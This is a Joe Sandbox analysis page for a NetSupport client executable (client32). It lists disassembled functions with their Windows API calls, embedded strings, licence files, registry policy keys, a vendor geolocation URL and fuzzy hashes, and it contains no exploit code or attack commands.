Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MessagePostwsprintf
String ID: *ListenPort$Client$Default$Global\NSMWClassAdmin$NSMWClass$NSMWControl32$NSSWControl32$NSTWControl32$Ready$TCPIP$TraceIPC$UseIPC$_debug
API String ID: 875889313-3431570279
Opcode ID: 308953ceba3eb16916e060fbe0517094e63593472d00720067f2536b78ae3a1c
Instruction ID: 917d364d5c6b0b603fb0f9ba81c7ab37e2e4bb2b49ece13a51dcd12a3dfde8f6
Opcode Fuzzy Hash: 308953ceba3eb16916e060fbe0517094e63593472d00720067f2536b78ae3a1c
Instruction Fuzzy Hash: C251FC74F42366AFE712CBE0CC55F69F7957B84B0CF200064E6156B6C9DAB0B540CB95

Function 110310D5 Relevance: 30.1, APIs: 9, Strings: 8, Instructions: 315
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNEL32(?), ref: 110310D9
GetStockObject.GDI32(0000000D), ref: 110312E6
GetObjectA.GDI32(00000000,0000003C,?), ref: 110312F6
SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11031334
SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1103133A
InterlockedExchange.KERNEL32(00348A70,00001388,?,?,?,?,?,?,00000050), ref: 110313BA
GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110313EC

Strings

Error %s unloading audiocap dll, xrefs: 11031603
&, xrefs: 11031585
j, xrefs: 11031341
pcicl32, xrefs: 110314C5
j0U, xrefs: 11031554
.%d, xrefs: 110313F6
*, xrefs: 11031381
, xrefs: 110313C2

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorModeObject$ExchangeInfoInterlockedNativeStockSystem
String ID: .%d$Error %s unloading audiocap dll$j0U$pcicl32$&$*$j$
API String ID: 1428277488-3745656997
Opcode ID: 7ab4675b5621614b5560d1b38db1ee70649d60d135089b240ffcc9cb50bab512
Instruction ID: bbabce5d96ec2c90806d5611ae465d21da0aa0097d7318abfc1e6149708f9681
Opcode Fuzzy Hash: 7ab4675b5621614b5560d1b38db1ee70649d60d135089b240ffcc9cb50bab512
Instruction Fuzzy Hash: 60C137B0E162759EDF02CBF48C847DDFAF4AB8830CF0445BAE855A7285EB715A80C752

Function 110310AC Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 249COMMON

Download Yara Rule

APIs

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

GetStockObject.GDI32(0000000D), ref: 110312E6
GetObjectA.GDI32(00000000,0000003C,?), ref: 110312F6
SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11031334
SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1103133A
InterlockedExchange.KERNEL32(00348A70,00001388,?,?,?,?,?,?,00000050), ref: 110313BA
GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110313EC
_sprintf.LIBCMT ref: 11031401
_setlocale.LIBCMT ref: 1103140B

Strings

Error %s unloading audiocap dll, xrefs: 11031603
&, xrefs: 11031585
j, xrefs: 11031341
pcicl32, xrefs: 110314C5
j0U, xrefs: 11031554
.%d, xrefs: 110313F6
*, xrefs: 11031381
, xrefs: 110313C2

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorModeObject$ExchangeInterlockedStock_malloc_memset_setlocale_sprintfwsprintf
String ID: .%d$Error %s unloading audiocap dll$j0U$pcicl32$&$*$j$
API String ID: 4242130455-3745656997
Opcode ID: 9ce7f7efe95e834453681c4923fbfa899ecbeaf8ae4f254e48ac6de1b4bac228
Instruction ID: e9c6acc14f93b40a3e0eb8b8fbec85b26532d2932113fe6213d234842048e606
Opcode Fuzzy Hash: 9ce7f7efe95e834453681c4923fbfa899ecbeaf8ae4f254e48ac6de1b4bac228
Instruction Fuzzy Hash: 9891F6B0E06365DEEF02CBF488847ADFFF0AB8830CF1445AAD45597285EB755A40CB52

Function 110287A0 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 130librarysynchronizationCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000102,NSM.LIC,00000009), ref: 110287F1

Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E

wsprintfA.USER32 ref: 11028814
WaitForSingleObject.KERNEL32(?,000000FF), ref: 11028859
GetExitCodeProcess.KERNEL32(?,?), ref: 1102886D
wsprintfA.USER32 ref: 11028891
CloseHandle.KERNEL32(?), ref: 110288A7
CloseHandle.KERNEL32(?), ref: 110288B0
LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,?,?,?,NSM.LIC,00000009), ref: 11028911
GetModuleHandleA.KERNEL32(00000000,00000000,?,?,?,?,?,NSM.LIC,00000009), ref: 11028925

Strings

", xrefs: 110287EA
Locales\%d\, xrefs: 11028881
pcicl32_res.dll, xrefs: 110288E9
SetClientResLang called, gPlatform %x, xrefs: 110287BC
Setting resource langid=%d, xrefs: 110288D1
\GetUserLang.exe", xrefs: 1102880E
NSM.LIC, xrefs: 110287B9, 110288D0

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Handle$CloseModulewsprintf$CodeExitFileLibraryLoadNameObjectProcessSingleWait_strrchr
String ID: "$Locales\%d\$NSM.LIC$SetClientResLang called, gPlatform %x$Setting resource langid=%d$\GetUserLang.exe"$pcicl32_res.dll
API String ID: 512045693-419896573
Opcode ID: 4194357b8a76256af92b6f7944f8688d207fe32debab0c1448cef28b04dbc8d5
Instruction ID: fa2db278f690afc2f691dfd055e17c1d40a227d38623a0fdca6da18cc7b7963a
Opcode Fuzzy Hash: 4194357b8a76256af92b6f7944f8688d207fe32debab0c1448cef28b04dbc8d5
Instruction Fuzzy Hash: 4F41B679E40228ABD714CF94DC89FE6B7A8EB45709F0081A5F95497284DAB0AD45CFA0

Function 110860E0 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 218libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(PCIINV.DLL), ref: 11086115

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

Part of subcall function 11110280: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,774E42C0,?,11110F3D,00000000,00000001,?,?,?,?,?,11031700), ref: 1111029E

GetProcAddress.KERNEL32(00000000,GetInventory,B24479DC,020249C8,020249B8,?,00000000,1118368C,000000FF,?,11032002,020249C8,00000000,?,?,?), ref: 1108613B
GetProcAddress.KERNEL32(00000000,Cancel,?,11032002,020249C8,00000000,?,?,?), ref: 1108614F
GetProcAddress.KERNEL32(00000000,GetInventoryEx,?,11032002,020249C8,00000000,?,?,?), ref: 11086163
wsprintfA.USER32 ref: 110861EB
wsprintfA.USER32 ref: 11086202
wsprintfA.USER32 ref: 11086219
CloseHandle.KERNEL32(00000000), ref: 1108636A

Part of subcall function 11085D50: CloseHandle.KERNEL32(?), ref: 11085D68
Part of subcall function 11085D50: CloseHandle.KERNEL32(?), ref: 11085D7B
Part of subcall function 11085D50: CloseHandle.KERNEL32(?), ref: 11085D8E
Part of subcall function 11085D50: FreeLibrary.KERNEL32(00000000,756F1222,?,?,11086390,?,11032002,020249C8,00000000,?,?,?), ref: 11085DA1

Strings

%s_HW.%s, xrefs: 110861E2
PCIINV.DLL, xrefs: 11086110
%s_SW.%s, xrefs: 110861FC
%s_HF.%s, xrefs: 11086213
Cancel, xrefs: 11086149
GetInventoryEx, xrefs: 11086157
GetInventory, xrefs: 11086135

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseHandlewsprintf$AddressProc$Library$CreateEventFreeLoad_malloc_memset
String ID: %s_HF.%s$%s_HW.%s$%s_SW.%s$Cancel$GetInventory$GetInventoryEx$PCIINV.DLL
API String ID: 4263811268-2492245516
Opcode ID: 79300dc539d0ee21f2e412ecc2afba85115f3a9800858e180ea8acaac6af75d4
Instruction ID: cc6116ccc6b21cbbfdc815c98c7fdad09c9720580d605ccac26d10648bac74b6
Opcode Fuzzy Hash: 79300dc539d0ee21f2e412ecc2afba85115f3a9800858e180ea8acaac6af75d4
Instruction Fuzzy Hash: 5471CDB4E44709ABEB10CF79DC51BDAFBE8EB48304F00456AF95AD7280EB75A500CB94

Function 11030B78 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 190synchronizationlibraryloaderCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32 ref: 11030CB3
CreateMutexA.KERNEL32(00000000,00000000,PCIMutex), ref: 11030CCA
GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 11030D6C
SetLastError.KERNEL32(00000078), ref: 11030D82
WaitForSingleObject.KERNEL32(?,000001F4), ref: 11030DBC
CloseHandle.KERNEL32(?), ref: 11030DC9
FreeLibrary.KERNEL32(?), ref: 11030DD4
CloseHandle.KERNEL32(00000000), ref: 11030DDB

Strings

_debug\tracefile, xrefs: 11030C16
PCIMutex, xrefs: 11030CA3, 11030CC3
SetProcessDPIAware, xrefs: 11030D66
SOFTWARE\Policies\NetSupport\Client\standard, xrefs: 11030BEA
_debug\trace, xrefs: 11030C04
/247, xrefs: 11030CD6
istaUI, xrefs: 11030BCD

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseHandleMutex$AddressCreateErrorFreeLastLibraryObjectOpenProcSingleWait
String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$_debug\trace$_debug\tracefile$istaUI
API String ID: 2061479752-1320826866
Opcode ID: 377beac14d7431bca268e8f4951fbe1a33445769506454ec8276ef22a8bf9555
Instruction ID: 041cc1499d836288ec3ce923e3d2bdfde1aeba2e10a7f52041b4b34688633552
Opcode Fuzzy Hash: 377beac14d7431bca268e8f4951fbe1a33445769506454ec8276ef22a8bf9555
Instruction Fuzzy Hash: 64610974E1631A9FEB15DBB08D89B9DF7B4AF4070DF0040A8E915A72C5EF74AA40CB51

Function 110F6150 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 117libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(Kernel32.dll), ref: 110F618F
GetCurrentProcessId.KERNEL32 ref: 110F61D1
GetProcAddress.KERNEL32(?,ProcessIdToSessionId), ref: 110F61DE
ProcessIdToSessionId.KERNEL32(00000000,00000000), ref: 110F61F0
SetLastError.KERNEL32(00000078), ref: 110F6203
GetCurrentProcessId.KERNEL32 ref: 110F620C
OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 110F6215
OpenProcessToken.ADVAPI32(00000000,00000008,11189C68), ref: 110F6228
GetTokenInformation.ADVAPI32(11189C68,0000000C(TokenIntegrityLevel),111EA880,00000004,?), ref: 110F6247
CloseHandle.KERNEL32(11189C68), ref: 110F626A
CloseHandle.KERNEL32(00000000), ref: 110F6271
FreeLibrary.KERNEL32(?), ref: 110F627B

Strings

Kernel32.dll, xrefs: 110F6187
ProcessIdToSessionId, xrefs: 110F61D8

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Process$CloseCurrentHandleLibraryOpenToken$AddressErrorFreeInformationLastLoadProcSession
String ID: Kernel32.dll$ProcessIdToSessionId
API String ID: 2607481436-2825297712
Opcode ID: e865c6473b299d360233d20d6969acab5fbd0a0a238613220fb6c2a45ad82976
Instruction ID: 420031f46cca3c2d8ff2aa46f1ed04d10c13eca04bac1e8faae0ba62584c02a7
Opcode Fuzzy Hash: e865c6473b299d360233d20d6969acab5fbd0a0a238613220fb6c2a45ad82976
Instruction Fuzzy Hash: 5C4119B5E416299FDB15DFE9DD89AAEFBB8FB08B04F10052AF421E3644D77099018B90

Function 1102D360 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 289servicesleepCOMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,19141918,1102E368,00000000,B24479DC,?,00000000,00000000), ref: 1102D594
OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102D5AA
QueryServiceStatus.ADVAPI32(00000000,?), ref: 1102D5BE
CloseServiceHandle.ADVAPI32(00000000), ref: 1102D5C5
Sleep.KERNEL32(00000032), ref: 1102D5D6
CloseServiceHandle.ADVAPI32(00000000), ref: 1102D5E6
Sleep.KERNEL32(000003E8), ref: 1102D632
CloseHandle.KERNEL32(?), ref: 1102D65F

Strings

IKS.LIC, xrefs: 1102D6B6, 1102D6BD, 1102D6ED
>, xrefs: 1102D50B
ProtectedStorage, xrefs: 1102D5A4
NSM.LIC, xrefs: 1102D697
NSA.LIC, xrefs: 1102D6A6

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$OpenSleep$ManagerQueryStatus
String ID: >$IKS.LIC$NSA.LIC$NSM.LIC$ProtectedStorage
API String ID: 83693535-1096744297
Opcode ID: 16638ad64ad6c87bf80ad98c247ef6ea51b2bd2907fd9caef6a18a875ee6ead4
Instruction ID: 28ce5055a28a8f5180363266ffebbc24acbf765ee5ceddae65e6c679609cb99b
Opcode Fuzzy Hash: 16638ad64ad6c87bf80ad98c247ef6ea51b2bd2907fd9caef6a18a875ee6ead4
Instruction Fuzzy Hash: 3DB18F75E012259BEB25CF64CC84BEDB7B5BB49708F5041E9E919AB380DB70AE80CF50

Function 1102CB60 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 238synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 111100D0: SetEvent.KERNEL32(00000000,?,1102CB9F), ref: 111100F4

WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102CBA5
GetTickCount.KERNEL32 ref: 1102CBCA

Part of subcall function 110D0960: __strdup.LIBCMT ref: 110D097A

GetTickCount.KERNEL32 ref: 1102CCC4

Part of subcall function 110D15C0: wvsprintfA.USER32(?,?,1102CC61), ref: 110D15EB

Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D

WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102CDBC
CloseHandle.KERNEL32(?), ref: 1102CDD8

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1102CE09, 1102CE1D, 1102CE31, 1102CE45
LatLong, xrefs: 1102CB88, 1102CC75
_debug, xrefs: 1102CC18, 1102CC7A
GeoIP, xrefs: 1102CC13
IsA(), xrefs: 1102CE0E, 1102CE22, 1102CE36, 1102CE4A
http://geo.netsupportsoftware.com/location/loca.asp, xrefs: 1102CBE5
GetLatLong=%s, took %d ms, xrefs: 1102CCE1
?IP=%s, xrefs: 1102CC56

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountObjectSingleTickWait$CloseEventHandle__strdup_freewvsprintf
String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
API String ID: 596640303-1725438197
Opcode ID: 4b4be5afc825d4046c7b89c8e65dc4458f3d4dc60d274e6f777fc83c6e95621d
Instruction ID: dd5538bcf42f02d8fc6af97e821dff418cbfa7b7de554536dce4014f8caac367
Opcode Fuzzy Hash: 4b4be5afc825d4046c7b89c8e65dc4458f3d4dc60d274e6f777fc83c6e95621d
Instruction Fuzzy Hash: 62817E34E0021A9BDF04DBE4CD90FEEF7B5AF55348F508259E82667284DB74BA05CBA1

Function 11062220 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 135registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?), ref: 1106227A

Part of subcall function 11061C60: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?), ref: 11061C9C
Part of subcall function 11061C60: RegEnumValueA.ADVAPI32 ref: 11061CF4

RegEnumKeyExA.ADVAPI32 ref: 110622CB
RegEnumKeyExA.ADVAPI32 ref: 11062385
RegCloseKey.ADVAPI32(?), ref: 110623A1

Strings

Software\Policies\NetSupport\Client, xrefs: 11062274
Software\Policies\NetSupport\Client\Standard, xrefs: 1106228D
Client, xrefs: 11062288, 110623B8
Standard, xrefs: 110622E6
DisableUserPolicies, xrefs: 110623B3
Client.%04d.%s, xrefs: 11062307
Software\Policies\NetSupport, xrefs: 1106231F
%s\%s\%s\, xrefs: 11062324
Client, xrefs: 1106231A

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Enum$Open$CloseValue
String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
API String ID: 2823542970-1528906934
Opcode ID: 30251da02dba7c4869162fd17402fcc4328921fd941fb637224b8cd017035ea6
Instruction ID: 91282df486796d8d45fa06834b6704f4eef725291cd5fd64ae30f86ab301b8e1
Opcode Fuzzy Hash: 30251da02dba7c4869162fd17402fcc4328921fd941fb637224b8cd017035ea6
